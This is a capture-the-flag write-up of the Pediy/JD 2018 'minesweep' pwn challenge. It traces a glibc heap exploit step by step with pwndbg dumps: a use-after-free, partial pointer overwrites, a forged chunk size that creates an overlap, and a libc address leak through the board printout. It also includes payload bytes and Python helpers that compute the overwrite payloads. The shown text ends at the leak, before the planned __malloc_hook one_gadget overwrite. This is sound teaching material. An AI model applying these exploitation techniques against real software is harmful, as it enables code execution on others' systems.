Pediy (看雪) / JD 2018 CTF, Problem 14: PWN-minesweep


Author: 静析机言 | Published 2019-05-28 17:16

This is a heap exploitation challenge with every mitigation enabled (PIE among them, which is why no address in the dumps below is fixed and a leak is needed before anything can be written).

The program implements an 8x8 minesweeper game.

The program menu:

1. Start Game

2. Feed Back Bugs

3. help

4. exit

$ 1

----------------------

Welcome to minesweeper

  Panel:8*8 Mine:30

----------------------

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

----------------------

The main menu has two useful entries: Start Game, which begins a round (and, because the pointers freed by out are never cleared, a later start() keeps operating on the previous round's chunks), and Feed Back Bugs (feed below).

Inside a game three commands are available:

explore  probe a cell

back  return to the main menu

out  clear the round (free its chunks) and return to the main menu

The bug is in out: it frees three chunks (chunk1, chunk4 and chunk5 below) but leaves the pointers to them in place, a use-after-free. feed lets you malloc a chunk of any size, write content into it and free it again, so the dangling pointers can be made to point at attacker-controlled data; that is what turns the UAF into something usable.

Plan: the name pointer stored in chunk1 gives an arbitrary write (the "hero" name is written through it), so it is used to overwrite __malloc_hook with a one_gadget address, and the next malloc spawns a shell. For the leak, the only functions that print variable data are printMatrix_1395 and printMatrix_14EE, which print the current board, so the leak has to go through the board printout.

Below, using the writeup by poyoten as the script, every step is traced in pwndbg and its effect on the heap explained, as a record of the learning process.

https://bbs.pediy.com/thread-229731.htm

1. start()

Start a game; chunks 1 to 6 are allocated. The game object (at 0x56034c1a6018) holds the chunk1 pointer, the board size 8, the mine count 0x1e = 30 and the chunk6 pointer:

0x56034c1a6018:    0x000056034da40010     0x0000000000000008  // chunk1 data, board size

0x56034c1a6028:    0x000000000000001e     0x000056034da40140  // mine count, chunk6 data

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041  //chunk1

0x56034da40010:    0x000056034da40080     0x0000000000000001  // -> chunk3 data

0x56034da40020:    0x000056034da400a0     0x0000000000000000  // -> chunk4 data

0x56034da40030:    0x000056034da400f0      0x000056034da40050  // -> chunk5 data (mine map), -> chunk2 data (name buffer: this last field is the name pointer)

0x56034da40040:    0x0000000000000000     0x0000000000000031  //chunk2

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021  //chunk3

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x0000000000000051  //chunk4

0x56034da400a0:    0x0000000000000000     0x0000000000000000

0x56034da400b0:    0x0000000000000000     0x0000000000000000

0x56034da400c0:    0x0000000000000000     0x0000000000000000

0x56034da400d0:    0x0000000000000000     0x0000000000000000

0x56034da400e0:    0x0000000000000000     0x0000000000000051  //chunk5: mine map, one byte per cell, 30 of the 64 bytes set

0x56034da400f0:     0x0100000000000101     0x0001010101000000

0x56034da40100:    0x0101000101010001     0x0000000001000001

0x56034da40110:    0x0000000100010001     0x0100000100010100

0x56034da40120:    0x0100010001010000     0x0101000000010100

0x56034da40130:    0x0000000000000000     0x0000000000000051  //chunk6: the eight row pointers

0x56034da40140:    0x000056034da40190     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x0000000000000000     0x0000000000000021  // row 0 string

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a  // "*X*X*2*2...": two bytes per cell, display char ('*' = hidden) then hidden value ('X' = mine or a digit)

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

The bins at this point:

pwndbg> bins

fastbins

0x20: 0x56034da40400 —▸ 0x56034da403e0 —▸ 0x56034da403c0 —▸ 0x56034da403a0 —▸ 0x56034da40380 ◂—...

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x56034da40280 ◂—0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

empty

largebins

empty

2. out()

chunk1 (0x40) goes into the 0x40 fastbin, chunk4 and chunk5 (0x50 each) into the 0x50 fastbin; every pointer to them stays in place.

pwndbg> bins

fastbins

0x20: 0x56034da40400 —▸ 0x56034da403e0 —▸ 0x56034da403c0 —▸ 0x56034da403a0 —▸ 0x56034da40380 ◂—...

0x30: 0x0

0x40: 0x56034da40000 ◂— 0x0

0x50: 0x56034da40090 —▸ 0x56034da400e0 ◂— 0x0

0x60: 0x56034da40280 ◂—0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

empty

largebins

empty

3. feed(0x30,'1'*0x28+'\xe8')

malloc(0x30) needs a 0x40 chunk, so chunk1 comes back out of the 0x40 fastbin. The 0x28 bytes of '1' run from the start of its data up to the name pointer, and the single byte 0xe8 replaces that pointer's low byte: 0x...40050 (chunk2) becomes 0x...400e8, the address of chunk5's size field. feed then frees the chunk again; the fd at offset 0 reads 0 because it is the only chunk in that bin.

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000: 0x0000000000000000 0x0000000000000041

0x56034da40010: 0x0000000000000000 0x3131313131313131

0x56034da40020: 0x3131313131313131 0x3131313131313131

0x56034da40030: 0x3131313131313131 0x000056034da400e8

4. start()

No change to the heap: the game object still references the freed chunks and keeps using them.

5. explore(1,1,3)

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000: 0x0000000000000000 0x0000000000000041

0x56034da40010: 0x0000000000000000 0x3131313131313131

0x56034da40020: 0x3131313131313131 0x3131313131313131

0x56034da40030: 0x3131313131313131 0x000056034da400e8

Because the field of chunk1 that holds the win flag now reads 0x3131313131313131 (it was overwritten with '1's in step 3), it is non-zero, so the program prints "leave your name, my hero" and asks for a name.

6. io.sendline('\xa1')

The name is written through the name pointer, i.e. at 0x...400e8: chunk5's size field becomes 0xa1 (size 0xa0, PREV_INUSE set) instead of 0x51. A 0xa0-byte chunk5 reaches 0x...40180, so it now covers chunk6 (header at 0x...40130, row pointers at 0x...40140). In the dump, 0x...400a0 holds 0x...400e0: that is chunk4's fastbin fd, pointing at chunk5, the next entry in the 0x50 bin.

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000: 0x0000000000000000 0x0000000000000041

0x56034da40010: 0x0000000000000000 0x3131313131313131

0x56034da40020: 0x3131313131313131 0x3131313131313131

0x56034da40030: 0x3131313131313131 0x000056034da400e8

0x56034da40040: 0x0000000000000000 0x0000000000000031

0x56034da40050: 0x0000000000000000 0x0000000000000000

0x56034da40060: 0x0000000000000000 0x0000000000000000

0x56034da40070: 0x0000000000000000 0x0000000000000021

0x56034da40080: 0x0000000000000000 0x0000000000000000

0x56034da40090: 0x0000000000000000 0x0000000000000051

0x56034da400a0: 0x000056034da400e0 0x0000000000000000

0x56034da400b0: 0x0000000000000000 0x0000000000000000

0x56034da400c0: 0x0000000000000000 0x0000000000000000

0x56034da400d0: 0x0000000000000000 0x0000000000000000

0x56034da400e0: 0x0000000000000000 0x00000000000000a1

0x56034da400f0: 0x0000000000000000 0x0001010101000000

0x56034da40100: 0x0101000101010001 0x0000000001000001

0x56034da40110: 0x0000000100010001 0x0100000100010100

0x56034da40120: 0x0100010001010000 0x0101000000010100

0x56034da40130: 0x0000000000000000 0x0000000000000051

0x56034da40140: 0x000056034da40190 0x000056034da401b0

0x56034da40150: 0x000056034da401d0 0x000056034da401f0

0x56034da40160: 0x000056034da40210 0x000056034da40230

0x56034da40170: 0x000056034da40250 0x000056034da40270

0x56034da40180: 0x0000000000000000 0x0000000000000021

0x56034da40190: 0x322a322a582a582a 0x582a332a332a332a

0x56034da401a0: 0x0000000000000000 0x0000000000000021

0x56034da401b0: 0x582a342a342a332a 0x342a582a582a582a

0x56034da401c0: 0x0000000000000000 0x0000000000000021

0x56034da401d0: 0x582a582a332a582a 0x582a582a352a582a

0x56034da401e0: 0x0000000000000000 0x0000000000000021

0x56034da401f0: 0x582a342a352a582a 0x322a322a332a342a

0x56034da40200: 0x0000000000000000 0x0000000000000021

0x56034da40210: 0x352a582a352a582a 0x312a312a322a582a

0x56034da40220: 0x0000000000000000 0x0000000000000021

0x56034da40230: 0x362a582a582a322a 0x582a332a332a582a

0x56034da40240: 0x0000000000000000 0x0000000000000021

0x56034da40250: 0x582a582a352a322a 0x582a352a582a332a

0x56034da40260: 0x0000000000000000 0x0000000000000021

0x56034da40270: 0x332a582a582a312a 0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x56034da40400 —▸ 0x56034da403e0 —▸ 0x56034da403c0 —▸ 0x56034da403a0 —▸ 0x56034da40380 ◂— ...

0x30: 0x0

0x40: 0x56034da40000 ◂— 0x0

0x50: 0x56034da40090 —▸ 0x56034da400e0 ◂— 0x0

0x60: 0x56034da40280 ◂— 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

empty

largebins

empty

io.sendline('back,')
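To see the overlap the forged size creates, here is a small heap walker added to this page (it is not part of the writeup): it parses the chunk-header lines of a pwndbg x/Ngx dump, follows the size fields the way glibc does, and reports which chunk now covers chunk6's header. The two dumps embedded in it are constructed from the step-1 and step-6 dumps above (only the header lines are needed); HEAP_BASE is the heap address of that session.

```python
import re

# Constructed input: the chunk-header lines copied from the writeup's pwndbg
# dumps, right after start() and after step 6 forged chunk5's size to 0xa1.
DUMP_AFTER_START = """
0x56034da40000: 0x0000000000000000 0x0000000000000041
0x56034da40040: 0x0000000000000000 0x0000000000000031
0x56034da40070: 0x0000000000000000 0x0000000000000021
0x56034da40090: 0x0000000000000000 0x0000000000000051
0x56034da400e0: 0x0000000000000000 0x0000000000000051
0x56034da40130: 0x0000000000000000 0x0000000000000051
0x56034da40180: 0x0000000000000000 0x0000000000000021
0x56034da401a0: 0x0000000000000000 0x0000000000000021
"""
DUMP_AFTER_STEP6 = DUMP_AFTER_START.replace(
    "0x56034da400e0: 0x0000000000000000 0x0000000000000051",
    "0x56034da400e0: 0x0000000000000000 0x00000000000000a1")

HEAP_BASE = 0x56034da40000          # first chunk of the session's heap
CHUNK6 = HEAP_BASE + 0x130          # header of the row-pointer table chunk

LINE_RE = re.compile(r"^\s*(0x[0-9a-fA-F]+):\s+(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)")


def parse_dump(text):
    """Map each 8-byte address in an `x/Ngx` dump to the qword stored there."""
    mem = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            addr = int(m.group(1), 16)
            mem[addr] = int(m.group(2), 16)
            mem[addr + 8] = int(m.group(3), 16)
    return mem


def walk_chunks(mem, start, limit=64):
    """Follow glibc chunk headers from `start`: the size word sits at +8 and its
    low three bits are flags (PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA)."""
    chunks = []
    addr = start
    while len(chunks) < limit and addr + 8 in mem:
        word = mem[addr + 8]
        size = word & ~0x7
        if size < 0x20:             # minimum chunk size on x86_64; anything less is garbage
            break
        chunks.append({"addr": addr, "size": size, "prev_inuse": bool(word & 1)})
        addr += size
    return chunks


def covering_chunk(chunks, victim):
    """The walked chunk whose [addr, addr+size) strictly contains `victim`'s
    header, i.e. the overlap a forged size creates; None if victim sits on a
    chunk boundary as it should."""
    for c in chunks:
        if c["addr"] < victim < c["addr"] + c["size"]:
            return c
    return None


def main():
    for label, dump in (("after start()", DUMP_AFTER_START), ("after step 6", DUMP_AFTER_STEP6)):
        chunks = walk_chunks(parse_dump(dump), HEAP_BASE)
        print(label)
        for c in chunks:
            print("  chunk @ 0x%x size 0x%x prev_inuse=%d" % (c["addr"], c["size"], c["prev_inuse"]))
        hit = covering_chunk(chunks, CHUNK6)
        print("  chunk6 @ 0x%x: %s" % (CHUNK6, "swallowed by 0x%x" % hit["addr"] if hit else "on a boundary"))


if __name__ == "__main__":
    main()
```

On the step-6 dump the walk never lands on 0x...40130: chunk5's header now claims 0xa0 bytes and the next boundary is 0x...40180, which is exactly why the consolidation in step 7 produces one 0xf0 chunk containing the row-pointer table.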

7. feed(0xe0,'a'*32)

feed with a large size: malloc(0xe0) needs a 0xf0 chunk, and nothing in the bins fits (0xf0 is above the fastbin limit and the unsorted bin is empty), so it is split off the top chunk at 0x56034da40420. After the write it is freed again: it borders top, so it merges back into it, and because the resulting top size (0x20be0) is above FASTBIN_CONSOLIDATION_THRESHOLD (0x10000) free() calls malloc_consolidate(). The consolidation walks the fastbins: the 0x20 and 0x60 chunks bordering top merge into top, chunk1 (0x40) goes to the unsorted bin, and chunk4 (0x50) merges with its neighbour chunk5, which thanks to the forged size is now 0xa0, into a single 0xf0 chunk at 0x56034da40090 that also goes to the unsorted bin. The merged chunk runs to 0x...40180 and therefore contains the mine map and chunk6's row-pointer table. Note that the second dump below comes from a different debugging session (heap at 0x55b55502b000, libc at another address); the layout is the same.

pwndbg> x/50gx 0x56034da40430-0x10

0x56034da40420:    0x0000000000000000     0x0000000000020be1

0x56034da40430:    0x6161616161616161     0x6161616161616161

0x56034da40440:    0x6161616161616161     0x6161616161616161

pwndbg> x/80gx 0x000055b55502b010-0x10

0x55b55502b000:    0x0000000000000000     0x0000000000000041

0x55b55502b010:    0x00007f305232fba8       0x00007f305232fba8

0x55b55502b020:    0x3131313131313131     0x3131313131313131

0x55b55502b030:    0x3131313131313131     0x000055b55502b0e8

0x55b55502b040:    0x0000000000000040     0x0000000000000030

0x55b55502b050:    0x0000000000000000     0x0000000000000000

0x55b55502b060:    0x0000000000000000     0x0000000000000000

0x55b55502b070:    0x0000000000000000     0x0000000000000021

0x55b55502b080:    0x0000000000000000     0x0000000000000000

0x55b55502b090:    0x0000000000000000     0x00000000000000f1  //chunk4 merged with chunk5, size = 0x50 + 0xa0 = 0xf0

0x55b55502b0a0:    0x00007f305232fc58       0x00007f305232fc58

0x55b55502b0b0:    0x0000000000000000     0x0000000000000000

0x55b55502b0c0:    0x0000000000000000     0x0000000000000000

0x55b55502b0d0:    0x0000000000000000     0x0000000000000000

0x55b55502b0e0:    0x0000000000000050     0x00000000000000a0  // stale chunk5 header (prev_size 0x50, size 0xa0 with PREV_INUSE cleared), now inside the merged chunk's data

0x55b55502b0f0:     0x0000000000000000     0x0000010000010101

0x55b55502b100:    0x0100010000000100     0x0101000000010001

0x55b55502b110:    0x0000000001010101     0x0101000001010001

0x55b55502b120:    0x0000000000000101     0x0100000101010001

0x55b55502b130:    0x0000000000000000     0x0000000000000051

0x55b55502b140:    0x000055b55502b190     0x000055b55502b1b0

0x55b55502b150:    0x000055b55502b1d0     0x000055b55502b1f0

0x55b55502b160:    0x000055b55502b210     0x000055b55502b230

0x55b55502b170:    0x000055b55502b250     0x000055b55502b270

0x55b55502b180:    0x00000000000000f0      0x0000000000000020

0x55b55502b190:    0x312a322a332a322a     0x582a582a582a322a

0x55b55502b1a0:    0x0000000000000000     0x0000000000000021

0x55b55502b1b0:    0x312a582a582a582a     0x332a362a582a332a

0x55b55502b1c0:    0x0000000000000000     0x0000000000000021

0x55b55502b1d0:    0x322a342a582a342a     0x582a352a582a322a

0x55b55502b1e0:    0x0000000000000000     0x0000000000000021

0x55b55502b1f0:     0x332a582a362a582a     0x582a582a322a322a

0x55b55502b200:    0x0000000000000000     0x0000000000000021

0x55b55502b210:    0x582a582a582a582a     0x342a342a322a322a

0x55b55502b220:    0x0000000000000000     0x0000000000000021

0x55b55502b230:    0x582a582a372a582a     0x582a582a312a322a

0x55b55502b240:    0x0000000000000000     0x0000000000000021

0x55b55502b250:    0x352a352a582a582a     0x332a332a322a332a

0x55b55502b260:    0x0000000000000000     0x0000000000000021

0x55b55502b270:    0x582a582a342a582a     0x582a312a312a582a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x56034da40000 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

empty

largebins

empty

8. feed(0xe0,'a'*0xa0+'\x41')

malloc(0xe0) scans the unsorted bin: chunk1 (0x40) is not an exact fit and is sorted into smallbin 0x40; the merged chunk4 (0xf0) is an exact fit and is returned. The 0xa0 bytes of 'a' fill 0x...400a0 up to 0x...40140, where chunk6's row pointers start, and the trailing 0x41 overwrites the low byte of row pointer 0: 0x...40190 becomes 0x...40141. The chunk is then freed back into the unsorted bin (fd/bk = main_arena+88).

The byte 0x41 chooses where the next start() reads row 0 from: pointed at 0x...40141, printMatrix shows the odd bytes of chunk6's own pointer value, and the first of them (byte 1 of the heap address) is the one needed later; ch-1 moves that byte back so the pointer lands on chunk4.

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da40141     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x7f0f33623b78 (main_arena+88) ◂— 0x56034da40090

smallbins

0x40: 0x56034da40000 —▸ 0x7f0f33623ba8 (main_arena+136) ◂— 0x56034da40000

largebins

empty

9. start()

ch = ord(getres()[0])

io.sendline('back,')

Row 0 is now printed from 0x...40141. printMatrix treats each cell as two bytes (display character, hidden value) and prints the display byte followed by two spaces, so the row shows the bytes at 0x...40141, 0x...40143, 0x...40145, 0x...40147 and, continuing into row pointer 1, 0x...40149 onward: 01 4d 56 00 01 4d 56 00, the odd bytes of the little-endian pointers 0x000056034da40141 and 0x000056034da401b0. getres()[0] is the first printed byte, 0x01, byte 1 of a heap address.

00000000  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │----│----│----│----│

00000010  2d 2d 2d 2d  2d 2d 0a 57  65 6c 63 6f  6d 65 20 74  │----│--·W│elco│me t│

00000020  6f 20 6d 69  6e 65 73 77  65 65 70 65  72 0a 20 20  │o mi│nesw│eepe│r·  │

00000030  20 50 61 6e  65 6c 3a 38  2a 38 20 4d  69 6e 65 3a  │ Pan│el:8│*8 M│ine:│

00000040  33 30 0a 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │30·-│----│----│----│

00000050  2d 2d 2d 2d  2d 2d 2d 2d  2d 0a 01 20  20 4d 20 20  │----│----│-·· │ M  │

00000060  56 20 20 00  20 20 01 20  20 4d 20 20  56 20 20 00  │V  ·│  · │ M  │V  ·│

00000070  20 20 0a 2a  20 20 2a 20  20 2a 20 20  2a 20 20 2a  │  ·*│  * │ *  │*  *│

00000080  20 20 2a 20  20 2a 20 20  2a 20 20 0a  2a 20 20 2a  │  * │ *  │*  ·│*  *│

00000090  20 20 2a 20  20 2a 20 20  2a 20 20 2a  20 20 2a 20  │  * │ *  │*  *│  * │

000000a0  20 2a 20 20  0a 2a 20 20  2a 20 20 2a  20 20 2a 20  │ *  │·*  │*  *│  * │

000000b0  20 2a 20 20  2a 20 20 2a  20 20 2a 20  20 0a 2a 20  │ *  │*  *│  * │ ·* │

000000c0  20 2a 20 20  2a 20 20 2a  20 20 2a 20  20 2a 20 20  │ *  │*  *│  * │ *  │

000000d0  2a 20 20 2a  20 20 0a 2a  20 20 2a 20  20 2a 20 20  │*  *│  ·*│  * │ *  │

000000e0  2a 20 20 2a  20 20 2a 20  20 2a 20 20  2a 20 20 0a  │*  *│  * │ *  │*  ·│

000000f0  2a 20 20 2a  20 20 2a 20  20 2a 20 20  2a 20 20 2a  │*  *│  * │ *  │*  *│

00000100  20 20 2a 20  20 2a 20 20  0a 2a 20 20  2a 20 20 2a  │  * │ *  │·*  │*  *│

00000110  20 20 2a 20  20 2a 20 20  2a 20 20 2a  20 20 2a 20  │  * │ *  │*  *│  * │

00000120  20 0a 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │ ·--│----│----│----│

00000130  2d 2d 2d 2d  2d 2d 2d 2d  0a                        │----│----│·│

11. feed(0xe0,'a'*0xa0+'\xa0'+chr(ch-1))

Takes the merged chunk4 out of the unsorted bin again, writes into it and frees it back. The two trailing bytes replace the low two bytes of row pointer 0 with 0xa0 and ch-1 = 0x00, giving 0x000056034da400a0, the start of chunk4's user data, which after the free holds the unsorted-bin fd (main_arena+88).
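Why ch-1 works regardless of ASLR, as an added example (not from the writeup): the low byte of any heap pointer is fixed by the chunk layout, and byte 1 of two pointers into the same heap differs only by the difference of their offsets' bits 8 and up, because a page-aligned heap base contributes no carry into byte 1. The offsets 0x140 (row table) and 0xa0 (chunk4 data) are read off the dumps above; the payload layout (0xa0 filler bytes, then the two low bytes) mirrors steps 8 and 11.

```python
import random

# Heap offsets taken from the writeup's dumps (heap base 0x56034da40000 there).
ROW_TABLE = 0x140     # chunk6 user data: eight row pointers, row 0 first
CHUNK4_DATA = 0x0a0   # chunk4 user data: holds the unsorted-bin fd once freed


def byte_at(value, index):
    """Byte `index` of a little-endian 64-bit value (0 = least significant)."""
    return (value >> (8 * index)) & 0xff


def predict_byte1(leaked_byte1, leaked_off, target_off):
    """Byte 1 of heap_base+target_off, given byte 1 of heap_base+leaked_off.
    The heap base has a zero low byte (it is page-aligned), so adding an
    offset never carries into byte 1, and the two bytes differ by exactly
    (target_off >> 8) - (leaked_off >> 8) modulo 256."""
    return (leaked_byte1 + (target_off >> 8) - (leaked_off >> 8)) & 0xff


def redirect_payload(leaked_byte1, target_off, fill=0xa0):
    """feed() payload: `fill` bytes reach the row-0 pointer, then its two low
    bytes are replaced so it points at heap_base+target_off. The leaked byte
    came from the pointer value heap_base+0x141 written in step 8 (the row
    pointer printed its own byte 1), hence leaked_off = ROW_TABLE + 1."""
    low = [target_off & 0xff, predict_byte1(leaked_byte1, ROW_TABLE + 1, target_off)]
    return b"a" * fill + bytes(low)


def verify_on_random_bases(trials=2000, seed=1234):
    """Cross-check the prediction against random page-aligned heap bases."""
    rng = random.Random(seed)
    for _ in range(trials):
        base = rng.getrandbits(35) << 12            # page-aligned, like a real brk heap
        leaked = byte_at(base + ROW_TABLE + 1, 1)    # what start() printed in step 9
        for target in (CHUNK4_DATA, CHUNK4_DATA + 1):
            if predict_byte1(leaked, ROW_TABLE + 1, target) != byte_at(base + target, 1):
                return False
    return True
```

For the session in the dumps the leaked byte is 0x01 and the payloads are 'a'*0xa0 + '\xa0\x00' and 'a'*0xa0 + '\xa1\x00', matching steps 11 and 14; the random-base check shows the same two-byte overwrite holds for any heap base, so no brute force is needed.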

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a0     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

0x40: 0x56034da40000 —▸ 0x7f0f33623ba8 (main_arena+136) ◂—0x56034da40000

largebins

empty

12. start()

printMatrix_1395 prints the display byte of each two-byte cell followed by two spaces, so row 0 now shows the even bytes of chunk4's fd and bk: x (0x78), b (0x62), 0x0f, 0x00, twice.

r1

00000000  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │----│----│----│----│

00000010  2d 2d 2d 2d  2d 2d 0a 57  65 6c 63 6f  6d 65 20 74  │----│--·W│elco│me t│

00000020  6f 20 6d 69  6e 65 73 77  65 65 70 65  72 0a 20 20  │o mi│nesw│eepe│r·  │

00000030  20 50 61 6e  65 6c 3a 38  2a 38 20 4d  69 6e 65 3a  │ Pan│el:8│*8 M│ine:│

00000040  33 30 0a 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │30·-│----│----│----│

00000050  2d 2d 2d 2d  2d 2d 2d 2d  2d 0a 78 20  20 62 20 20  │----│----│-·x │ b  │

00000060  0f 20 20 00  20 20 78 20  20 62 20 20  0f 20 20 00  │·  ·│  x │ b  │·  ·│

00000070  20 20 0a 2a  20 20 2a 20  20 2a 20 20  2a 20 20 2a  │  ·*│  * │ *  │*  *│

00000080  20 20 2a 20  20 2a 20 20  2a 20 20 0a  2a 20 20 2a  │  * │ *  │*  ·│*  *│

00000090  20 20 2a 20  20 2a 20 20  2a 20 20 2a  20 20 2a 20  │  * │ *  │*  *│  * │

000000a0  20 2a 20 20  0a 2a 20 20  2a 20 20 2a  20 20 2a 20  │ *  │·*  │*  *│  * │

